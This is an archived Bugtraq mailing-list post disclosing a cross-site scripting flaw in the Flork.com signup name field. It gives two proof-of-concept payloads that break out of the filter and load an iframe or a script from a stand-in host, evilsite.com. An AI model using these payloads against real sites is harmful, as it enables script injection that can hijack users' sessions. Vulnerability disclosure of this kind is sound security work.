[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Flork.com

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Flork.com
From: luny@xxxxxxxxxxxxxxx
Date: 10 Jun 2006 20:49:42 -0000

Flork.com

Effected files:
input boxes when creating a new user

XSS Vulnerabiliy:

We notice by adding empty tags and endingand beginning brackets we can bypass 
the filter of the flork.com signup.
For PoC try adding either one of the below codes in as your name:

">'>'><iframe src=http://evilsite.com/scriptlet.html <<"<'<'

">'>'><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><'<'

Prev by Date: Re: SSL VPNs and security
Next by Date: Vampirefreaks.com - XSS with cookie disclosure
Previous by thread: myPHP Guestbook 2.0.2 XSS Vulnerabilitie
Next by thread: Vampirefreaks.com - XSS with cookie disclosure
Index(es):
- Date
- Thread